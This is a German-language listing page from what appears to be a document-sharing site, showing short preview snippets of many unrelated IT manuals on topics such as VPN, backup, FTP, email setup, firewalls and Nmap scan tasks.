Universal Dashboard auf ewon Alarmübersicht auf ewon eigener HTML Seite.

Universal Dashboard auf ewon Alarmübersicht auf ewon eigener HTML Seite. ewon - Technical Note Nr. 003 Version 1.2 Universal Dashboard auf ewon Alarmübersicht auf ewon eigener HTML Seite. Übersicht 1. Thema 2. Benötigte Komponenten 3. Downloaden der Seiten und aufspielen auf

Mehr

Diese Anleitung beschreibt das Vorgehen mit dem Browser Internet Explorer. Das Herunterladen des Programms funktioniert in anderen Browsern ähnlich.

Diese Anleitung beschreibt das Vorgehen mit dem Browser Internet Explorer. Das Herunterladen des Programms funktioniert in anderen Browsern ähnlich. Die Lernsoftware Revoca Das Sekundarschulzentrum Weitsicht verfügt über eine Lizenz bei der Lernsoftware «Revoca». Damit können die Schülerinnen und Schüler auch zu Hause mit den Inhalten von Revoca arbeiten.

Mehr

IBM Software Demos Tivoli Provisioning Manager for OS Deployment

IBM Software Demos Tivoli Provisioning Manager for OS Deployment Für viele Unternehmen steht ein Wechsel zu Microsoft Windows Vista an. Doch auch für gut vorbereitete Unternehmen ist der Übergang zu einem neuen Betriebssystem stets ein Wagnis. ist eine benutzerfreundliche,

Mehr

Die DeskCenter Management Suite veröffentlicht neue Version 8.1

Die DeskCenter Management Suite veröffentlicht neue Version 8.1 Die DeskCenter Management Suite veröffentlicht neue Version 8.1 Neues im Basis Modul Benutzerdefinierte Felder Die DeskCenter Management Suite erlaubt nun das Erstellen von selbst definierten Eingabefeldern.

Mehr

Inhalt. 1 Einleitung AUTOMATISCHE DATENSICHERUNG AUF EINEN CLOUDSPEICHER

Inhalt. 1 Einleitung AUTOMATISCHE DATENSICHERUNG AUF EINEN CLOUDSPEICHER AUTOMATISCHE DATENSICHERUNG AUF EINEN CLOUDSPEICHER Inhalt 1 Einleitung... 1 2 Einrichtung der Aufgabe für die automatische Sicherung... 2 2.1 Die Aufgabenplanung... 2 2.2 Der erste Testlauf... 9 3 Problembehebung...

Mehr

Benutzerhandbuch. Leitfaden zur Benutzung der Anwendung für sicheren Dateitransfer.

Benutzerhandbuch. Leitfaden zur Benutzung der Anwendung für sicheren Dateitransfer. Benutzerhandbuch Leitfaden zur Benutzung der Anwendung für sicheren Dateitransfer. 1 Startseite Wenn Sie die Anwendung starten, können Sie zwischen zwei Möglichkeiten wählen 1) Sie können eine Datei für

Mehr

Adminer: Installationsanleitung

Adminer: Installationsanleitung Adminer: Installationsanleitung phpmyadmin ist bei uns mit dem Kundenmenüpasswort geschützt. Wer einer dritten Person Zugriff auf die Datenbankverwaltung, aber nicht auf das Kundenmenü geben möchte, kann

Mehr

FTP-Leitfaden RZ. Benutzerleitfaden

FTP-Leitfaden RZ. Benutzerleitfaden FTP-Leitfaden RZ Benutzerleitfaden Version 1.4 Stand 08.03.2012 Inhaltsverzeichnis 1 Einleitung... 3 1.1 Zeitaufwand... 3 2 Beschaffung der Software... 3 3 Installation... 3 4 Auswahl des Verbindungstyps...

Mehr

disk2vhd Wie sichere ich meine Daten von Windows XP? Vorwort 1 Sichern der Festplatte 2

disk2vhd Wie sichere ich meine Daten von Windows XP? Vorwort 1 Sichern der Festplatte 2 disk2vhd Wie sichere ich meine Daten von Windows XP? Inhalt Thema Seite Vorwort 1 Sichern der Festplatte 2 Einbinden der Sicherung als Laufwerk für Windows Vista & Windows 7 3 Einbinden der Sicherung als

Mehr

Software zur Anbindung Ihrer Maschinen über Wireless- (GPRS/EDGE) und Breitbandanbindungen (DSL, LAN)

Software zur Anbindung Ihrer Maschinen über Wireless- (GPRS/EDGE) und Breitbandanbindungen (DSL, LAN) Software zur Anbindung Ihrer Maschinen über Wireless- (GPRS/EDGE) und Breitbandanbindungen (DSL, LAN) Definition Was ist Talk2M? Talk2M ist eine kostenlose Software welche eine Verbindung zu Ihren Anlagen

Mehr

! " # $ " % & Nicki Wruck worldwidewruck 08.02.2006

!  # $  % & Nicki Wruck worldwidewruck 08.02.2006 !"# $ " %& Nicki Wruck worldwidewruck 08.02.2006 Wer kennt die Problematik nicht? Die.pst Datei von Outlook wird unübersichtlich groß, das Starten und Beenden dauert immer länger. Hat man dann noch die.pst

Mehr

Verwendung des IDS Backup Systems unter Windows 2000

Verwendung des IDS Backup Systems unter Windows 2000 Verwendung des IDS Backup Systems unter Windows 2000 1. Download der Software Netbackup2000 Unter der Adresse http://www.ids-mannheim.de/zdv/lokal/dienste/backup finden Sie die Software Netbackup2000.

Mehr

Diese Anleitung erläutert die Einrichtung des Active Directory Modus im DNS-343.

Diese Anleitung erläutert die Einrichtung des Active Directory Modus im DNS-343. Diese Anleitung erläutert die Einrichtung des Active Directory Modus im DNS-343. Benutzte Hardware: Router DGL-4100 mit der IP Adresse 192.168.0.1 Rechner mit Betriebssystem Windows Server 2000 und Active

Mehr

ICS-Addin. Benutzerhandbuch. Version: 1.0

ICS-Addin. Benutzerhandbuch. Version: 1.0 ICS-Addin Benutzerhandbuch Version: 1.0 SecureGUARD GmbH, 2011 Inhalt: 1. Was ist ICS?... 3 2. ICS-Addin im Dashboard... 3 3. ICS einrichten... 4 4. ICS deaktivieren... 5 5. Adapter-Details am Server speichern...

Mehr

DriveLock 6. DriveLock und das Windows Sicherheitsproblem mit LNK Dateien. CenterTools Software GmbH

DriveLock 6. DriveLock und das Windows Sicherheitsproblem mit LNK Dateien. CenterTools Software GmbH 6 DriveLock und das Windows Sicherheitsproblem mit LNK Dateien CenterTools Software GmbH 2010 Copyright Die in diesen Unterlagen enthaltenen Angaben und Daten, einschließlich URLs und anderen Verweisen

Mehr

INTERNETZUGANG WLAN-ROUTER ANLEITUNG FIRMWARE-UPDATE SIEMENS

INTERNETZUGANG WLAN-ROUTER ANLEITUNG FIRMWARE-UPDATE SIEMENS Wichtige Hinweise: Das Firmware-Update geschieht auf eigene Gefahr! NetCologne übernimmt keine Verantwortung für mögliche Schäden an Ihrem WLAN-Router, die in Zusammenhang mit dem Firmware-Update oder

Mehr

Protect 7 Anti-Malware Service. Dokumentation

Protect 7 Anti-Malware Service. Dokumentation Dokumentation Protect 7 Anti-Malware Service 1 Der Anti-Malware Service Der Protect 7 Anti-Malware Service ist eine teilautomatisierte Dienstleistung zum Schutz von Webseiten und Webapplikationen. Der

Mehr

Update und Konfiguraton mit dem ANTLOG Konfigurations-Assistenten

Update und Konfiguraton mit dem ANTLOG Konfigurations-Assistenten Update und Konfiguraton mit dem ANTLOG Konfigurations-Assistenten Der Konfigurations-Assistent wurde entwickelt, um die unterschiedlichen ANTLOG-Anwendungen auf den verschiedensten Umgebungen automatisiert

Mehr

Schritt-Schritt-Anleitung zum mobilen PC mit Paragon Drive Copy 10 und VMware Player

Schritt-Schritt-Anleitung zum mobilen PC mit Paragon Drive Copy 10 und VMware Player PARAGON Technologie GmbH, Systemprogrammierung Heinrich-von-Stephan-Str. 5c 79100 Freiburg, Germany Tel. +49 (0) 761 59018201 Fax +49 (0) 761 59018130 Internet www.paragon-software.com Email sales@paragon-software.com

Mehr

FTP-Server einrichten mit automatischem Datenupload für SolarView@Fritzbox

FTP-Server einrichten mit automatischem Datenupload für SolarView@Fritzbox FTP-Server einrichten mit automatischem Datenupload für SolarView@Fritzbox Bitte beachten: Der im folgenden beschriebene Provider "www.cwcity.de" dient lediglich als Beispiel. Cwcity.de blendet recht häufig

Mehr

Windows Server 2012 RC2 konfigurieren

Windows Server 2012 RC2 konfigurieren Windows Server 2012 RC2 konfigurieren Kurzanleitung um einen Windows Server 2012 als Primären Domänencontroller einzurichten. Vorbereitung und Voraussetzungen In NT 4 Zeiten, konnte man bei der Installation

Mehr

ANYWHERE Zugriff von externen Arbeitsplätzen

ANYWHERE Zugriff von externen Arbeitsplätzen ANYWHERE Zugriff von externen Arbeitsplätzen Inhaltsverzeichnis 1 Leistungsbeschreibung... 3 2 Integration Agenda ANYWHERE... 4 3 Highlights... 5 3.1 Sofort einsatzbereit ohne Installationsaufwand... 5

Mehr

Dieses HowTo darf nicht vervielfältigt oder veröffentlich werden ohne Einverständnis des Erstellers. Alle Angaben ohne Gewähr.

Dieses HowTo darf nicht vervielfältigt oder veröffentlich werden ohne Einverständnis des Erstellers. Alle Angaben ohne Gewähr. [HowTo] Einrichten von POP3 & SMTP am Client Autor(en): Michael Ruck Stand: 19.09.2008 Version: 1.0 Lotus Notes Client Versionen: 6.x, 7.x, 8.x Michael Ruck Dieses HowTo darf nicht vervielfältigt oder

Mehr

COMPUTER MULTIMEDIA SERVICE

COMPUTER MULTIMEDIA SERVICE Umgang mit Web-Zertifikaten Was ist ein Web-Zertifikat? Alle Webseiten, welche mit https (statt http) beginnen, benötigen zwingend ein Zertifikat, welches vom Internet-Browser eingelesen wird. Ein Web

Mehr

Diese Anleitung enthält Anweisungen, die nur durch erfahrene Anwender durchgeführt werden sollten!

Diese Anleitung enthält Anweisungen, die nur durch erfahrene Anwender durchgeführt werden sollten! Anmeldung über SSH Diese Anleitung enthält Anweisungen, die nur durch erfahrene Anwender durchgeführt werden sollten! Besitzer der Homepage Advanced und Homepage Professional haben die Möglichkeit, direkt

Mehr

OP-LOG www.op-log.de

OP-LOG www.op-log.de Verwendung von Microsoft SQL Server, Seite 1/18 OP-LOG www.op-log.de Anleitung: Verwendung von Microsoft SQL Server 2005 Stand Mai 2010 1 Ich-lese-keine-Anleitungen 'Verwendung von Microsoft SQL Server

Mehr

Lexware professional und premium setzen bis einschließlich Version 2012 den Sybase SQL-Datenbankserver

Lexware professional und premium setzen bis einschließlich Version 2012 den Sybase SQL-Datenbankserver Eine Firewall für Lexware professional oder premium konfigurieren Inhaltsverzeichnis: 1. Allgemein... 1 2. Einstellungen... 1 3. Die Firewall von Windows 7 und Windows 2008 Server... 2 4. Die Firewall

Mehr

Mit jedem Client, der das Exchange Protokoll beherrscht (z.b. Mozilla Thunderbird mit Plug- In ExQulla, Apple Mail, Evolution,...)

Mit jedem Client, der das Exchange Protokoll beherrscht (z.b. Mozilla Thunderbird mit Plug- In ExQulla, Apple Mail, Evolution,...) Das tgm steigt von Novell Group Wise auf Microsoft Exchange um. Sie können auf ihre neue Exchange Mailbox wie folgt zugreifen: Mit Microsoft Outlook Web Access (https://owa.tgm.ac.at) Mit Microsoft Outlook

Mehr

Installationsanleitung OpenVPN

Installationsanleitung OpenVPN Installationsanleitung OpenVPN Einleitung: Über dieses Dokument: Diese Bedienungsanleitung soll Ihnen helfen, OpenVPN als sicheren VPN-Zugang zu benutzen. Beachten Sie bitte, dass diese Anleitung von tops.net

Mehr

KURZANLEITUNG CLOUD OBJECT STORAGE

KURZANLEITUNG CLOUD OBJECT STORAGE KURZANLEITUNG CLOUD OBJECT STORAGE Version 1.12 01.07.2014 SEITE _ 2 INHALTSVERZEICHNIS 1. Einleitung... Seite 03 2. Anmelden am Cloud&Heat Dashboard... Seite 04 3. Anlegen eines Containers... Seite 05

Mehr

Task: Nmap Skripte ausführen

Task: Nmap Skripte ausführen Task: Nmap Skripte ausführen Inhalt Einfache Netzwerkscans mit NSE Ausführen des Scans Anpassung der Parameter Einleitung Copyright 2009-2015 Greenbone Networks GmbH Herkunft und aktuellste Version dieses

Mehr

Sie müssen sich für diesen Fall mit IHREM Rechner (also zeitgut jk o.ä.) verbinden, nicht mit dem Terminalserver.

Sie müssen sich für diesen Fall mit IHREM Rechner (also zeitgut jk o.ä.) verbinden, nicht mit dem Terminalserver. Sie müssen sich für diesen Fall mit IHREM Rechner (also zeitgut jk o.ä.) verbinden, nicht mit dem Terminalserver. Am 15.08.2015 um 21:03 schrieb Jürgen Kleindienst : bei einer Terminalsitzung steht mir

Mehr

Öffnen Sie den Internet-Browser Ihrer Wahl. Unabhängig von der eingestellten Startseite erscheint die folgende Seite in Ihrem Browserfenster:

Öffnen Sie den Internet-Browser Ihrer Wahl. Unabhängig von der eingestellten Startseite erscheint die folgende Seite in Ihrem Browserfenster: Schritt 1: Verbinden Sie Ihr wireless-fähiges Gerät (Notebook, Smartphone, ipad u. ä.) mit dem Wireless-Netzwerk WiFree_1. Die meisten Geräte zeigen Wireless-Netzwerke, die in Reichweite sind, automatisch

Mehr

Einrichten eines Postfachs mit Outlook Express / Outlook bis Version 2000

Einrichten eines Postfachs mit Outlook Express / Outlook bis Version 2000 Folgende Anleitung beschreibt, wie Sie ein bestehendes Postfach in Outlook Express, bzw. Microsoft Outlook bis Version 2000 einrichten können. 1. Öffnen Sie im Menü die Punkte Extras und anschließend Konten

Mehr

Externe Authentifizierung. Externe Authentifizierung IACBOX.COM. Version 2.0.1 Deutsch 23.05.2014

Externe Authentifizierung. Externe Authentifizierung IACBOX.COM. Version 2.0.1 Deutsch 23.05.2014 Version 2.0.1 Deutsch 23.05.2014 In diesem HOWTO wird beschrieben wie Sie verschiedene Backend's wie SQL Server, Radius Server, Active Directory etc. zur Authentifizierung der Benutzer an die IAC-BOX anbinden.

Mehr

Firewalls für Lexware Info Service konfigurieren

Firewalls für Lexware Info Service konfigurieren Firewalls für Lexware Info Service konfigurieren Inhaltsverzeichnis: 1. MANUELLER DOWNLOAD 1 2. ALLGEMEIN 1 3. EINSTELLUNGEN 1 4. BITDEFENDER VERSION 10 2 5. GDATA INTERNET SECURITY 2007 4 6. ZONE ALARM

Mehr

Datenbank-Verschlüsselung mit DbDefence und Webanwendungen.

Datenbank-Verschlüsselung mit DbDefence und Webanwendungen. Datenbank-Verschlüsselung mit DbDefence und Webanwendungen. In diesem Artikel werden wir Ihnen zeigen, wie Sie eine Datenbank verschlüsseln können, um den Zugriff einzuschränken, aber trotzdem noch eine

Mehr

Sichere E-Mails. Kundeninformation zur Verschlüsselung von E-Mails in der L-Bank

Sichere E-Mails. Kundeninformation zur Verschlüsselung von E-Mails in der L-Bank Sichere E-Mails Kundeninformation zur Verschlüsselung von E-Mails in der L-Bank Version: 2.1 Stand: 18.07.2014 Inhaltsverzeichnis II Inhaltsverzeichnis 1 Einleitung... 1 1.1 Überblick... 1 1.2 Allgemeine

Mehr

Step by Step VPN unter Windows Server 2003. von Christian Bartl

Step by Step VPN unter Windows Server 2003. von Christian Bartl Step by Step VPN unter Windows Server 2003 von VPN unter Windows Server 2003 Einrichten des Servers 1. Um die VPN-Funktion des Windows 2003 Servers zu nutzen muss der Routing- und RAS-Serverdienst installiert

Mehr

Virtueller Seminarordner Anleitung für die Dozentinnen und Dozenten

Virtueller Seminarordner Anleitung für die Dozentinnen und Dozenten Virtueller Seminarordner Anleitung für die Dozentinnen und Dozenten In dem Virtuellen Seminarordner werden für die Teilnehmerinnen und Teilnehmer des Seminars alle für das Seminar wichtigen Informationen,

Mehr

Anleitung für Konfiguration von eduroam unter Windows XP

Anleitung für Konfiguration von eduroam unter Windows XP Anleitung für Konfiguration von eduroam unter Windows XP Die folgenden Voraussetzungen müssen erfüllt sein, damit der Netzwerkzugang mit eduroam konfiguriert werden kann: Gültiger Benutzeraccount der Universität

Mehr

Fernzugriff auf Kundensysteme. Bedienungsanleitung für Kunden

Fernzugriff auf Kundensysteme. Bedienungsanleitung für Kunden inquiero Fernzugriff auf Kundensysteme Bedienungsanleitung für Kunden Bahnhofstrasse 1, CH-8304 Wallisellen Tel.: +41 (0)44 205 84 00, Fax: +41 (0)44 205 84 01 E-Mail: info@elray-group.com, www.elray-group.com

Mehr

Anleitung: Confixx auf virtuellem Server installieren

Anleitung: Confixx auf virtuellem Server installieren Anleitung: Confixx auf virtuellem Server installieren Diese Anleitung beschreibt Ihnen, wie Sie Confixx 3.0 auf Ihrem virtuellen Server installieren. 1. Schritt: Rufen Sie die Adresse www.vpsadmin.de in

Mehr

Verwendung des Terminalservers der MUG

Verwendung des Terminalservers der MUG Verwendung des Terminalservers der MUG Inhalt Allgemeines... 1 Installation des ICA-Client... 1 An- und Abmeldung... 4 Datentransfer vom/zum Terminalserver... 5 Allgemeines Die Medizinische Universität

Mehr

Erstellen einer PostScript-Datei unter Windows XP

Erstellen einer PostScript-Datei unter Windows XP Erstellen einer PostScript-Datei unter Windows XP Sie möchten uns Ihre Druckvorlage als PostScript-Datei einreichen. Um Fehler in der Herstellung von vorneherein auszuschließen, möchten wir Sie bitten,

Mehr

Abruf und Versand von Mails mit Verschlüsselung

Abruf und Versand von Mails mit Verschlüsselung Bedienungstip: Verschlüsselung Seite 1 Abruf und Versand von Mails mit Verschlüsselung Die folgende Beschreibung erklärt, wie man mit den üblichen Mailprogrammen die E- Mailabfrage und den E-Mail-Versand

Mehr

WordPress lokal mit Xaamp installieren

WordPress lokal mit Xaamp installieren WordPress lokal mit Xaamp installieren Hallo und willkommen zu einem weiteren Teil der WordPress Serie, in diesem Teil geht es um die Lokale Installation von WordPress mithilfe von Xaamp. Kurz und knapp

Mehr

Windows 8 Lizenzierung in Szenarien

Windows 8 Lizenzierung in Szenarien Windows 8 Lizenzierung in Szenarien Windows Desktop-Betriebssysteme kommen in unterschiedlichen Szenarien im Unternehmen zum Einsatz. Die Mitarbeiter arbeiten an Unternehmensgeräten oder bringen eigene

Mehr

SCHRITT FÜR SCHRITT ZU IHRER VERSCHLÜSSELTEN E-MAIL

SCHRITT FÜR SCHRITT ZU IHRER VERSCHLÜSSELTEN E-MAIL SCHRITT FÜR SCHRITT ZU IHRER VERSCHLÜSSELTEN E-MAIL www.klinik-schindlbeck.de info@klinik-schindlbeck.de Bitte beachten Sie, dass wir nicht für die Sicherheit auf Ihrem Endgerät verantwortlich sein können.

Mehr

Leichte-Sprache-Bilder

Leichte-Sprache-Bilder Leichte-Sprache-Bilder Reinhild Kassing Information - So geht es 1. Bilder gucken 2. anmelden für Probe-Bilder 3. Bilder bestellen 4. Rechnung bezahlen 5. Bilder runterladen 6. neue Bilder vorschlagen

Mehr

Einrichten der Outlook-Synchronisation

Einrichten der Outlook-Synchronisation Das will ich auch wissen! - Kapitel 3 Einrichten der Outlook-Synchronisation Inhaltsverzeichnis Überblick über dieses Dokument... 2 Diese Kenntnisse möchten wir Ihnen vermitteln... 2 Diese Kenntnisse empfehlen

Mehr

Anti-Botnet-Beratungszentrum. Windows XP in fünf Schritten absichern

Anti-Botnet-Beratungszentrum. Windows XP in fünf Schritten absichern Windows XP in fünf Schritten absichern Inhalt: 1. Firewall Aktivierung 2. Anwendung eines Anti-Virus Scanner 3. Aktivierung der automatischen Updates 4. Erstellen eines Backup 5. Setzen von sicheren Passwörtern

Mehr

AnNoText. AnNoText Online-Update. Copyright Wolters Kluwer Deutschland GmbH

AnNoText. AnNoText Online-Update. Copyright Wolters Kluwer Deutschland GmbH Copyright Wolters Kluwer Deutschland GmbH AnNoText AnNoText Online-Update Wolters Kluwer Deutschland GmbH Software + Services Legal Robert-Bosch-Straße 6 D-50354 Hürth Telefon (02 21) 9 43 73-6000 Telefax

Mehr

Partitionieren in Vista und Windows 7/8

Partitionieren in Vista und Windows 7/8 Partitionieren in Vista und Windows 7/8 Windows Vista und Windows 7 können von Haus aus Festplatten partitionieren. Doch die Funktion ist etwas schwer zu entdecken, denn sie heißt "Volume verkleinern".

Mehr

Informations- und Kommunikationsinstitut der Landeshauptstadt Saarbrücken. Upload- / Download-Arbeitsbereich

Informations- und Kommunikationsinstitut der Landeshauptstadt Saarbrücken. Upload- / Download-Arbeitsbereich Informations- und Kommunikationsinstitut der Landeshauptstadt Saarbrücken Upload- / Download-Arbeitsbereich Stand: 27.11.2013 Eine immer wieder gestellte Frage ist die, wie man große Dateien austauschen

Mehr

Anleitung. Schritt für Schritt: iphone und ipad. Richten Sie Ihr E-Mail-Konto mit Ihrem iphone oder ipad Schritt für Schritt ein.

Anleitung. Schritt für Schritt: iphone und ipad. Richten Sie Ihr E-Mail-Konto mit Ihrem iphone oder ipad Schritt für Schritt ein. Anleitung Schritt für Schritt: iphone und ipad Richten Sie Ihr E-Mail-Konto mit Ihrem iphone oder ipad Schritt für Schritt ein. Inhaltsverzeichnis 1 E-Mail-Konten-Verwaltung... 1 2 E-Mail-Konto hinzufügen...

Mehr

mysql - Clients MySQL - Abfragen eine serverbasierenden Datenbank

mysql - Clients MySQL - Abfragen eine serverbasierenden Datenbank mysql - Clients MySQL - Abfragen eine serverbasierenden Datenbank In den ersten beiden Abschnitten (rbanken1.pdf und rbanken2.pdf) haben wir uns mit am Ende mysql beschäftigt und kennengelernt, wie man

Mehr

Was sind Soziale Netzwerke? Stelle dazu selbstständig Überlegungen an!

Was sind Soziale Netzwerke? Stelle dazu selbstständig Überlegungen an! Erkundungsbogen Datenspionage Klassenstufen 7-9 Spionage gibt es nicht nur in Film und Fernsehen, sondern hat über viele Jahrhunderte auch unser Leben sehr beeinflusst! Mit den neuen, digitalen Medien

Mehr

HTBVIEWER INBETRIEBNAHME

HTBVIEWER INBETRIEBNAHME HTBVIEWER INBETRIEBNAHME Vorbereitungen und Systemvoraussetzungen... 1 Systemvoraussetzungen... 1 Betriebssystem... 1 Vorbereitungen... 1 Installation und Inbetriebnahme... 1 Installation... 1 Assistenten

Mehr

Die Dateiablage Der Weg zur Dateiablage

Die Dateiablage Der Weg zur Dateiablage Die Dateiablage In Ihrem Privatbereich haben Sie die Möglichkeit, Dateien verschiedener Formate abzulegen, zu sortieren, zu archivieren und in andere Dateiablagen der Plattform zu kopieren. In den Gruppen

Mehr

Daten Sichern mit dem QNAP NetBak Replicator 4.0

Daten Sichern mit dem QNAP NetBak Replicator 4.0 Daten Sichern mit dem QNAP NetBak Replicator 4.0 Was ist NetBak Replicator: Der NetBak Replicator ist ein Backup-Programm von QNAP für Windows, mit dem sich eine Sicherung von Daten in die Giri-Cloud vornehmen

Mehr

Acronis Backup & Recovery 10 Server for Windows Acronis Backup & Recovery 10 Workstation

Acronis Backup & Recovery 10 Server for Windows Acronis Backup & Recovery 10 Workstation Acronis Backup & Recovery 10 Server for Windows Acronis Backup & Recovery 10 Workstation Schnellstartanleitung 1 Über dieses Dokument Dieses Dokument beschreibt, wie Sie die folgenden Editionen von Acronis

Mehr

Klicken Sie mit einem Doppelklick auf das Symbol Arbeitsplatz auf Ihrem Desktop. Es öffnet sich das folgende Fenster.

Klicken Sie mit einem Doppelklick auf das Symbol Arbeitsplatz auf Ihrem Desktop. Es öffnet sich das folgende Fenster. ADSL INSTALLATION WINDOWS 2000 Für die Installation wird folgendes benötigt: Alcatel Ethernet-Modem Splitter für die Trennung Netzwerkkabel Auf den folgenden Seiten wird Ihnen in einfachen und klar nachvollziehbaren

Mehr

Online Schulung Anmerkungen zur Durchführung

Online Schulung Anmerkungen zur Durchführung Online Schulung Anmerkungen zur Durchführung 1.0 Einleitung Vielen Dank, dass Sie sich für die Online Schulung von SoloProtect entschieden haben. Nachfolgend finden Sie Informationen für Identicomnutzer

Mehr

Xerox Device Agent, XDA-Lite. Kurzanleitung zur Installation

Xerox Device Agent, XDA-Lite. Kurzanleitung zur Installation Xerox Device Agent, XDA-Lite Kurzanleitung zur Installation Überblick über XDA-Lite XDA-Lite ist ein Softwareprogramm zur Erfassung von Gerätedaten. Sein Hauptzweck ist die automatische Übermittlung von

Mehr

Das Starten von Adami Vista CRM

Das Starten von Adami Vista CRM Das Starten von Adami Vista CRM 1. Herunterladen Der AdamiVista Installations-Kit wird auf unsere Website zur verfügung gestellt, auf die Download Seite: http://www.adami.com/specialpages/download.aspx.

Mehr

ISA Server 2004 - Best Practice Analyzer

ISA Server 2004 - Best Practice Analyzer ISA Server 2004 - Best Practice Analyzer Die Informationen in diesem Artikel beziehen sich auf: Microsoft ISA Server 2004 Seit dem 08.12.2005 steht der Microsoft ISA Server 2004 Best Practice Analyzer

Mehr

Memeo Instant Backup Kurzleitfaden. Schritt 1: Richten Sie Ihr kostenloses Memeo-Konto ein

Memeo Instant Backup Kurzleitfaden. Schritt 1: Richten Sie Ihr kostenloses Memeo-Konto ein Einleitung Memeo Instant Backup ist eine einfache Backup-Lösung für eine komplexe digitale Welt. Durch automatisch und fortlaufende Sicherung Ihrer wertvollen Dateien auf Ihrem Laufwerk C:, schützt Memeo

Mehr

Guide DynDNS und Portforwarding

Guide DynDNS und Portforwarding Guide DynDNS und Portforwarding Allgemein Um Geräte im lokalen Netzwerk von überall aus über das Internet erreichen zu können, kommt man um die Themen Dynamik DNS (kurz DynDNS) und Portweiterleitung(auch

Mehr

Eine Anleitung, wie Sie Mozilla Thunderbird 2 installieren und konfigurieren können. Installation... 2. Erstkonfiguration... 4

Eine Anleitung, wie Sie Mozilla Thunderbird 2 installieren und konfigurieren können. Installation... 2. Erstkonfiguration... 4 E-Mail-Client Mozilla Thunderbird für Studierende Installation und Einrichtung Mozilla Thunderbird ist ein Open-Source-E-Mail-Programm und -Newsreader des Mozilla-Projekts. Es ist neben Microsoft Outlook

Mehr

WOT Skinsetter. Nun, erstens, was brauchen Sie für dieses Tool zu arbeiten:

WOT Skinsetter. Nun, erstens, was brauchen Sie für dieses Tool zu arbeiten: WOT Skinsetter WOT Skinsetter steht für World of Tanks skinsetter (WOTS von nun an). Mit diesen Tool können Sie Skins importieren und ändern, wann immer Sie möchten auf einfache Weise. Als World of Tanks

Mehr

Installation und Sicherung von AdmiCash mit airbackup

Installation und Sicherung von AdmiCash mit airbackup Installation und Sicherung von AdmiCash mit airbackup airbackup airbackup ist eine komfortable, externe Datensicherungslösung, welche verschiedene Funktionen zur Sicherung, sowie im Falle eines Datenverlustes,

Mehr

Installationsleitfaden kabelsafe backup home unter MS Windows

Installationsleitfaden kabelsafe backup home unter MS Windows Installationsleitfaden kabelsafe backup home unter MS Windows Installationsanleitung und Schnelleinstieg kabelsafe backup home (kabelnet-acb) unter MS Windows Als PDF herunterladen Diese Anleitung können

Mehr